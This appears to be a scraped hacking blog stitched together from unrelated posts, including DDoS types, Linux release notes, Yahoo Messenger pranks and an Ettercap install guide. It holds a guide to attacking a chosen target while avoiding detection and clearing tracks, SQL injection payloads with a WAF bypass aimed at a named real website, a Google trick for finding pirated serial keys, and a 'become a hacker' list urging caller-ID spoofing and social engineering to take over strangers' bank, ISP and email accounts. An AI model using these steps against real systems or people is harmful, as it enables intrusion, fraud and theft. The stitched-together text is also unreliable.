Distributed Denial of Service Attack (DDoS) Part 1

DoS stands for “Distributed Denial of Service.” A DDoS attack is a malicious attempt to make a server or a network resource unavailable to users, usually by temporarily interrupting or suspending the services of a host connected to the Internet.

Unlike a Denial of Service (DoS) attack, in which one computer and one internet connection is used to flood targeted resource with packets, a DDoS attack uses many computers and many Internet connections,

DDoS attacks can be broadly divided in three types:

Volume Based Attacks – includes UDP floods, ICMP floods, and other spoofed-packet floods. The attack’s goal is to saturate the bandwidth of the attacked site, and magnitude is measured in bits per second (Bps).
Protocol Attacks – includes SYN floods, fragmented packet attacks, Ping of Death, Smurf DDoS and more. This type of attack consumes actual server resources, or those of intermediate communication equipment, such as firewalls and load balancers, and is measured in Packets per second.
Application Layer Attacks – includes Slowloris, Zero-day DDoS attacks, DDoS attacks that target Apache, Windows or OpenBSD vulnerabilities and more. Comprised of seemingly legitimate and innocent requests, the goal of these attacks is to crash the web server, and the magnitude is measured in Requests per second.

Specific DDoS Attacks Types

Some specific and particularly popular and dangerous types of DDoS attacks include:

UDP Flood – this DDoS attack leverages the User Datagram Protocol (UDP), a sessionless networking protocol. This type of attack floods random ports on a remote host with numerous UDP packets, causing the host to repeatedly check for the application listening at that port, and (when no application is found) reply with an ICMP Destination Unreachable packet. This process saps host resources, and can ultimately lead to inaccessibility.
ICMP (Ping) Flood – similar in principle to the UDP flood attack, an ICMP flood overwhelms the target resource with ICMP Echo Request (ping) packets, generally sending packets as fast as possible without waiting for replies. This type of attack can consume both outgoing and incoming bandwidth, since the victim’s servers will often attempt to respond with ICMP Echo Reply packets, resulting a significant overall system slowdown.
SYN Flood – A SYN flood DDoS attack exploits an known weakness in the TCP connection sequence (the “three-way handshake”), wherein a SYN request to initiate a TCP connection with a host must be answered by a SYN-ACK response from that host, and then confirmed by an ACK response from the requester. In a SYN flood scenario, the requester sends multiple SYN requests, but either does not respond to the host’s SYN-ACK response, or sends the SYN requests from a spoofed IP address. Either way, the host system continues to wait for acknowledgement for each of the requests, binding resources until no new connections can be made, and ultimately resulting in denial of service.
Ping of Death – a ping of death ("POD") attack involves the attacker sending multiple malformed or malicious pings to a computer. The maximum packet length of an IP packet (including header) is 65,535 bytes. However, the Data Link Layer usually poses limits to the maximum frame size - for example 1500 bytes over an Ethernet network. In this case, a large IP packet is split across multiple IP packets (known as fragments), and the recipient host reassembles the IP fragments into the complete packet. In a Ping of Death scenario, following malicious manipulation of fragment content, the recipient ends up with an IP packet which is larger than 65,535 bytes when reassembled. This can overflow memory buffers allocated for the packet, causing denial of service for legitimate packets.
Slowloris – especially dangerous to hosts running Apache, dhttpd, Tomcat and GoAhead WebServer, Slowloris is a highly-targeted attack, enabling one web server to take down another server, without affecting other services or ports on the target network. Slowloris does this by holding as many connections to the target web server open for as long as possible. It accomplishes this by creating connections to the target server, but sending only a partial request. Slowloris constantly sends more HTTP headers, but never completes a request. The targeted server keeps each of these false connections open. This eventually overflows the maximum concurrent connection pool, and leads to denial of additional connections from legitimate clients.
Zero-day DDoS – “Zero-day” are simply unknown or new attacks, exploiting vulnerabilities for which no patch has yet been released. The term is well-known hacker community, and trading Zero-day vulnerabilities that can be used in attacks has become a popular activity.

Hello, this little post will explain in rough details how you start hacking a specific target.

First. There are many different ways going about this, but this is one way.

Information gathering
The first thing you want to do when targeting a specific target is get as much information as possible before a front attack(if any, being quiet is much better)
Now this step can take ages if you really want a detailed level of knowledge. And if you are serious about hacking your target, you should be detailed here.
What sort of information do I look for you might ask yourself? Well, anything really. Anything surrounding the target and even things that surround things that surround your target. Here is a short list of things that might be useful;
IP(s), some machines/domains/systems or whatever have multiple domains
ISP(s), if small ISP(s), get owner details here as below
Owner. Email, name, location, family, hobby's, Facebook account, phone number
*Open ports. On ALL of the ips/servers if there are multiple
Service signatures, find out as much as possible about all the open ports, are they in use? What software are they running at the other end? Do the services reveal any other information about the system? OS? Internal IPS?
Hosters(In most cases there will be a hosting company)
Hosters information - Owner and all of that(If the company is small)
Hosters member system, how does the members login? Is there a login? Is there a forgot password function? Can you exploit the hoster instead?(might be easier in some cases)
DNS records(if any), subdomains? Hidden domains/info? DNS hosters? Same as above.
The physical server(s) location / datacenter
And the list goes on and on and on. Literally EVERYTHING about the company/system/server/target are relevant. The more info you got, the easier it will be attacking him/her/them/it.

You should decide if you want to target the system or the people of your target. That is, code/system flaws or human flaws(keyloggers, Trojans, social engineering, info gathering + password guessing, etc). This decision should depend on the information you find about your target. Both can be tried ofcourse, just make sure the target does not know you are trying to hack it, often one of the attempts will set off alerts.

This whole information gathering part might seem unnecessary, but really. Its neat, lets you put things in perspective so you can find the best point of entry.

The attack
Before an attack is lunched, there are a few things you need to think about. Here is a list of things you should think about;
Will this company/target rage crazy if I hack them? If so, check 3rd point.
Will police or other agencies be contacted if I hack them? If so, check 3rd point.
*Is my privacy good enough? Are you behind a proxy(s)? Should you? Do the proxy log?(It shouldn't)
Are they running any services at all? If not, you don't really have any virtual way in..
Are they running web applications? These are typically easier to hack than services. And have a higher percentage rate of flaws.
Do the target got a open router/switch/modem system? This often happens with home computers/networks.
Are your target running platforms with logins? These could be targeted.
Do you have enough time? Its a good practice to have time enough to do the entire attack in one go. Else you might fire off warnings for the target, and he can go into a bombshelter We don't want that now, do we?

Now there are tree ways of attacking in this guide.
- Service/software exploitation
- Web application exploitation
- Human factor exploitation

Service/software exploitation
Here you will exploit one or more services/programs running on the target system. In most cases, this will be called bufferoverflow. This can do everything from bypassing a login to give you instant shell access. In scenarios where the target is running services which is not a web server(can be tho) this might be the way to go.

Web application exploitation
This is without a doubt the most vulnerable field. Web applications are flawfull, 70% or so of all pages got some sort of web application flaw, this ofc may vary from an stupid XSS to a serious RFI. In scenarios where the target system are running a web server, this is the first thing to check. Do always check web applications before going on to service exploitation if you just want to get the target hacked.

Human factor exploitation
Now if all other things fail, there is ALWAYS a human factor. This can be social engineering the target to give you limited access, and you work your way up from there. Or simply tricking the target to trust you and in some strange way share his password, perhaps not for the system you are targeting, but for his email or an online account or whatever, stupid people tend to use the same password or the same password syntax everywhere. Keep in mind that the human factor doesn't necessarily have to be your targets owner, could be the hoster, the DNS hoster, the ISP, family.

Finale note
If you think its necessary, clear your tracks. If you ask me, if you can see that you have been there you didn't do it right. Take care, be safe.

Zorin OS 6.2 lite has been Released

Artyom Zorin has announced the release of Zorin OS 6.2 "Lite" edition, an updated release of the project's Ubuntu-based lightweight distribution (with LXDE) designed for new Linux users: "The Zorin OS team has released Zorin OS 6.2 Lite, the latest evolution of the Zorin OS Lite series of operating systems, designed specifically for Windows users using old or low-powered hardware. This release is based on Lubuntu 12.04.2 and uses the LXDE desktop environment to provide one of the fastest and most feature-packed interfaces for low-spec machines. This new release includes newly updated software out of the box. We also include our innovative Zorin Look Changer, Zorin Internet Browser Manager, Zorin OS Lite Extra Software and other programs from our earlier versions in Zorin OS 6.2 Lite." Here is the brief release announcement.

Zorin OS Lite 6.2 is built on the Linux architecture so it is completely open source and it's based on Ubuntu, one of the most used Linux operating system in the world.
This latest version of Zorin OS Lite is still based on Lubuntu 12.04.2 (Precise Pangolin), which was released only a couple of days ago, and it uses the LXDE desktop environment.
Zorin Look Changer, Zorin Internet Browser Manager, Zorin OS Lite Extra Software and other programs from earlier versions have been added to Zorin OS 6.2 Lite.

Download (MD5) from here: zorin-os-6.2-lite.iso (650MB)

Another Great Ubuntu Flavor Linux Lite 1.0.6 (Based on Ubuntu 12.04)

Linux Lite is free, stable, light and simple fully functional out of the box with complete set of applications, it is based on Ubuntu LTS (Long Term Support) releases and this distribution support period is 5 years. So you don't need to worry about to install new version after 1 or 2 years but you only need to install just once every 5 years. During these 5 years Linux Lite current version will get security and software updates.
It is also recommended to those people who are new to Linux or for those who want really lightweight desktop environment. It is also great choice for old laptop or desktop you gave up on a few years back. Linux Lite is a showcase for just how easy it can be to use Linux. From familiar software like Firefox and Thunderbird, to simply named menu items, to one click updates and software installs.

Linux Lite team just released 1.0.6 version for 32bit and 64bit with Xfce desktop environment, based on Ubuntu 12.04.
Linux Lite 1.0.6 new features include easier networking setup between Linux Lite and Windows or other Linux operating systems, a system report tool to help troubleshoot problems, support for scanners, Bluetooth and a brand-new login screen. The Help and Support Manual is our most comprehensive to date and is available both offline and online.

Changelog:

• Firefox 21.0
• Kernel 3.2.0.40 pae
• Rewrote Help & Support Manual
• Added Scanner support.
• Added Bluetooth.
• Added 'Drives' shortcut to home folder.
• Added Show Desktop button.
• Added support for iDevices.
• Added right click 'Open as Administrator' to Thunar.
• Added/Removed Install Additional Software scripts.
• Added Enable/Disable automatic login to System menu.
• Added Network Share Settings to System menu.
• Added Create System Report to System menu.
• Replaced Wicd with Network Manager.
• New live boot menu.
• New login screen.
• New install slides.
• Announcement of the Linux Lite Shop.
• Fixed auto login if chosen during installation.
• Bug fixes.
• and So on...

Here is the brief release announcement.

Screenshots 

Boot Screen

Login Screen

Desktop

File Manager & Terminal

Additional Software & System Info Tool

Installed Applications & Application finder

Task Manager

Yahoo Messenger is one of the highly popular and most widely used instant messaging service in the world offering a wide variety of features to its users, all for free. This has made it the right choice for all those who are waiting to chat and communicate with their far away friends and relatives.

However, while some people use Yahoo Messenger only to chat with their friends and known ones, many others use it to have fun by joining the chat rooms and chatting with the strangers. If you’re a similar person who would like to have fun during the chat, this post if for you!

In this post, I will show you some really interesting Yahoo Messenger hacks using which it is possible to play pranks with your friends and strangers during the chat. Below is a list of some cool hacks that you’re sure to enjoy:

1. Chat with Multiple Names Simultaneously

How about chatting with your friend with two or more different names at a time? Well, do not think that this is impossible! This can easily be done with a simple workaround which enables you to chat with as many different names as you can with the same or different people.

For example, you may chat with Person-A using one name and with Person-B using the other. You can also chat with the same person using different names or any other combination. All of this goes really unnoticed by the user on the other side, while you are sure to have some real fun.

Here is a step-by-step procedure to implement this hack:

1. Sign in to your Yahoo Messenger. From the top, click on Messenger -> My Account Info. You will be taken to a web page where you need to log in to your account.
2. Now, you should be on the Profile Settings page. Scroll down to see the option Account Settings as shown below. From there, click on the link which says: “Manage your Yahoo! aliases”.
   
3. From the Aliases page, click on: “Add an alias”. You can create as many aliases you want. Choose unique names for your alias and once you’re done, click on “close”.
4. You need to sign out of Yahoo Messenger and sign in again to see the changes. Once you have done this, double-click on any name from your contact list or chat room to open a new chat window. You should now see a list of your aliases appearing in the chat window to choose from.
   
5. To chat with multiple names with a single person, just follow the steps below:
   • Double-click on the name of the person in the chat room or contact list.
   • Select any name from your “alias” list and ping the user with that name. Immediately close the chat window before you get a reply from that person.
   • Again double-click on the same person’s name and ping him/her with another name from your “alias” list. This time do not close the window.
   • Just wait a few seconds! When the person replies to both your pings, you will have two tabs in the same chat window from where you can chat with the same person using two different names. Enjoy!!!

How to Know if Someone Accessed My Computer When I am Away

 

Do you have a feeling that someone tried to access your computer when you stepped out for a lunch or quick coffee break? Perhaps your colleague or the person sitting in the next desk tried to log in or play something wicked on your computer while you were away for a quick session.

So, how do you know if someone tried to access your computer in your absence? Well, here is a way by which you get notified every time when such an attempt is made.

The website called MouseLock.co gives a solution here. All you have to do is visit the site’s homepage, sign in to your Gmail account and select your secret point (unlock code) from the screen. Once you do this, you will have to place your mouse cursor into the slot shown and click on it. This will activate the mouse lock feature on your computer screen.

So, when an unauthorized person tries to move the mouse in your absence, he will be given just a few seconds to select the unlock code. Upon failure to do so, you will get an instant notification about the intrusion in your mailbox.

If you have a webcam attached to your computer, you can even get the photo of the person trying to intrude. This will make it easy for you to figure out who actually was the person.

As this is an easy to use web application, you can use it any time just by loading the MouseLock website without the need to install anything on your computer. Even though MouseLock does not manage to prevent the intrusion, it will give you an instant notification about it, so that you aware of what is happening at your desk when you are away.

How it Works?

MouseLock operates by using the “mouseLeaveEvent” from JQuery to track the mouse movements. On the other hand, it uses the “getUserMedia()” API that is supported by Chrome and Firefox to capture the webcam photographs.

 

HOW TO USE GOOGLE TO FIND SERIAL KEY OF ANY SOFTWARE
1)open google

2)type the name of software u want to crack or serial key

3)press space and now type 94fbr

for example (quickheal 94fbr)

Ettercap is by far one of the most powerful Security Tools to perform Communication Interception on both Local and Wireless Networks.
A few days ago, Version 0.7.5 was released, introducing three new and exciting features:
1. SSL Password Interception. Captures user credentials from secure web portals such as Facebook, Yahoo, Hotmail and Gmail. This technique is based on the "Sslstrip" tool.
2. IPv6 Support. With this feature, we can now perform security tests over this network generation, giving us new and exciting Ethical Hacking opportunities.
3. NBNS Spoofing. Steals the identitiy of any network device or service, as long as it is based on Netbios name resolution. This attack is very useful on Windows Networks and Samba servers. It can also be used to attack other technologies such as SAN and NAS.
As Security Experts, we need to stay at the cutting edge of our field, testing new attack tools and their capabilities as soon as they become available.
Unfortunately, Ettercap's installation procedure is very poorly documented. Despite my amazing Google Powers, I have not found any useful Internet tutorial. To make things worse, even the great BackTrack distribution does not include the new version.
Furthermore, I really doubt we'll see the new version on Ubuntu's software repositories any time soon. Ettercap authors strongly recommend using "development" libraries, which are considered "unstable" for most production environments.
To solve the conundrum, I decided to write this tutorial, explaining a detailed installation procedure for Ettercap on Ubuntu 12.04. Of course, a rookie Hacker might say "I'll just install it on Windows! Problem solved!".
Well, if you are one of these rookies, I have bad news for you. Installing it on Windows is extremely easy. However, this platform does not support the new SSL attack!
So, with this Tutorial, I'm going to help you become one of the first Ethical Hackers in the whole Universe with the knowledge and power to use the new Ettercap awesome features.
INSTALLATION PROCEDURE
1. Installing Dependencies. Ettercap requires a lot of software libraries not usually available on a standard Ubuntu system. To install them, just open a terminal and run the following commands:
apt-get install -y cmake cmake-curses-gui
apt-get install -y libgtk2.0-dev libnet1-dev flex build-essential
apt-get install -y linux-headers-`uname -r` libpcre3-dev libpcap0.8-dev openssl
apt-get install -y libssl-dev ncurses-bin libncurses5-dev libnet6-1.3-dev libpthread-stubs0-dev
apt-get install -y zlib1g-dev libltdl-dev pango-graphite pkg-config libpango1.0-dev
apt-get install -y libatk1.0-dev libgtk2.0-dev autoconf byacc
(To accelerate the installation, open this tutorial in your browser and just copy-paste the instructions on your terminal, instead of entering them manually).
2. Sslstrip support. This new feature requires a recent libcurl library version, not yet available in Ubuntu's repositories. So, we need to install it from source. Run the following commands:
cd /usr/src
wget http://curl.haxx.se/download/curl-7.28.0.tar.gz
tar xvfz curl-7.28.0.tar.gz
cd curl-7.28.0
./configure
make
make install
In this tutorial, I'm using /usr/src as destination folder, feel free to use whatever you want.
To make sure Ettercap finds the new library, open the /etc/ld.so.conf file. Add /usr/local/lib at the end. Save the file and run ldconfig to complete the installation.
2. IPv6 Support. This new feature requires a recent libnet library version, not yet available in Ubuntu's repositories. Again, we are going to install it from source. Go to http://sourceforge.net/projects/libnet-dev/ and download the libnet-1.1.6.tar.gz file to any folder. In this tutorial, I'm using /usr/src
Run the following commands from your terminal:
cd /usr/src
tar xvfz libnet-1.1.6.tar.gz
cd libnet-1.1.6
./configure
make
make install
ldconfig
3. Ettercap Installation. Open http://sourceforge.net/projects/ettercap in your browser. Download ettercap-0-7.5.tar.gz to any folder.
In this tutorial, I use /hack/network/mitm (I install all my "Man in The Middle" attack tools in this folder, hence the name. Of course, you can choose any other folder).
Run the following commands in your terminal:
cd /hack/network/mitm
tar xvfz ettercap-0.7.5.tar.gz
cd ettercap-0.7.5
mkdir build
cd build
cmake ..
ccmake ..
You'll see the following screen:

Change the following fields, with the indicated values:
ENABLE_IPV6 ON
FOUND_LIBCURL /usr/local/lib/libcurl.so
HAVE_LIBNET /usr/local/lib/libnet.so
Press Enter after modifying each field, press "c" to return to configuration mode, and finally "g" to save the changes and exit. Finish Ettercap's installation by running the following commands:
make
make install
SSLSTRIP CONFIGURATION
1. Sslstrip capability requires root privileges to make some temporal changes to the local firewall. To grant them, open Ettercap's configuration file /etc/ettercap/etter.conf. Modify the text at line 17, so it reads ec_uid = 0.

2. Delete the # comment character from lines 171 and 172. These are firewall modifications required by Sslstrip, used only while Ettercap is running. Don't worry, they are just network traffic redirection instructions and do not jeopardize your firewall integrity in any way.

Save the etter.conf file.
ETTERCAP TESTING
Run the following command:
ettercap -G
If everything works as expected, you'll see the following screen:

Congratulations! You are now one of the first and proud Ethical Hackers in the whole Universe to test the new and powerful Ettercap!
Now go have a drink... You know you deserve it.

Itz COST Free but not EFFORT Free ;)
Now u can get your free domain name at
www.freedomainfactory.com
OR
www.freepremiumdomain.com

All u have to do is Sign Up....invite your friends thru your referal link and complete surveys to earn points..DATZ IT!!

Common Problem
(Still No Error in order by 10000--)

First thing you do when a website is vulnerable to SQL injection is to check
the number of columns inside the database.
Already tried to put 10000 columns test but still got no errors?
Having problems knowing the number of columns inside the database?
The reason is it is blocked by the WAF, but here is a method to bypass it.

Example Vuln:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10'

Example:
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10+order+by+10000--

If there is no error with that number of columns, it will be impossible for a small site like this. :)
To bypass this, you have to add ' after parameter id and also put + at the end.

So you will have something like this.. :)
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10%27+order+by+10000--+

NOTE
YOU STILL HAVE TO CONTINUE USING THE ' AND + AS YOU CONTINUE LIKE THIS.
http://www.ruralcentar.org.rs/en/detaljnije.php?idp=10' union select 1,2,3,4,5,6,7,8,9,10,11,12--+

HOPE YOU ENJOY THE TUTORIAL!

How to Become a Hacker:

1. Learn TCP/IP, Basic

Information gathering,

Proxies, Socks, SSL, VPN, VPS,
RDP, FTP, POP3, SMTP, Telnet,
SSH. 2. Learn Linux, Unix, Windows
- You can do this using
vmware or any virtual
desktop utility. 3. Learn a programming
language that's compatible
with all OS - Perl, Python, C . 4. Learn HTML, PHP, Javascript,
ASP, XML, SQL, XSS, SQLI, RFI,
LFI 5. Learn Reverse engineering
and crack some programs for
serials easy ones like mirc,
winzip, winrar or old games. 6. Code a fuzzer for common
protocols - ftp, pop3, 80, 8080 -
Pick some free software like
ftp server, mail server, apache
or iis webserver or a
webserver all-in-one pack, or teamspeak, ventrilo, mumble. 7. Code a tool that uses grep to
sort out unique code in source
codes. 8. Make a custom IPtable, IPsec
firewall that blocks all
incoming traffic and out going
traffic and add filters to accept
certain ports that your
software or scripts use. 9. Pick a kernel in linux or
unix, also pick a Microsoft OS
version lets say Winxp pro sp2
put them on the virtual
desktops (vmware) and find
and code a new local exploit in those versions, then install a
Apache webserver on the
Linux/Unix and a IIS
webserver on the winxp pro
and attempt to find and code a
new local reverse_tcp_shell exploit. 10. Learn Cisco Router and
Switch configuration and
setup. 11. Learn Checkpoint Setup and
Config 12. Learn Wifi scanning,
cracking, sniffing. 13. Pick a person in you
phonebook for the area code
you live in or city then ring
the person on a anonymous
line like skype or a payphone
or a carded sim and attempt to social engineer the person for
his name, address, data of
birth, city born, country born,
ISP connected with, Phone
company connected with,
What bank he/she uses and anything else you can get.
Then Attempt to ring using a
spoof caller ID software with
the person's phone number -
call the ISP and try reset the
password to his/her internet connection/ webmail, get
access to bank account or ask
them to send out a new *** to
a new address (drop) with a
new pin, reset of phone
company passwords. 14. Use your information
gathering skills to get all the
information off a website like
a shop then use the spoof
callerID software or hack your
phone to show a new number of the Webserver's Tech
Support number then ring the
shop owner and try get the
shop site password. 15. Do the same thing but
attempt to use a web attack
against a site or shop to gain
admin access. 16. Once got access upload a
shell and attempt to exploit
the server to gain root using a
exploit you coded not
someone else s exploit. 17. Make your own Linux
Distro 18. Use your own Linux Distro
or use a vanilla Linux gnome
(not kde) keep it with not
much graphics so you can learn
how to depend on the
terminal and start from scratch install applications that you
will only need for a blackbox
(Security test box), make
folders for fuzzers, exploits,
scanners..etc Then load them
up with your own scripts and other tools ( By this stage you
shouldn't need to depend on
other peoples scripts). 19. Learn macosx and attempt
to gain access to a Macosx box
whether it be your own or
someones else s. 20. Create a secure home
network and secure your own
systems with your own
Security policies and firewall
settings. All this isn't a over night
learning it will take a nice 3 - 4
years to learn a bit of this 5+
years to learn most of it and
even then you may need time
to keep learn as IT keeps changing everyday.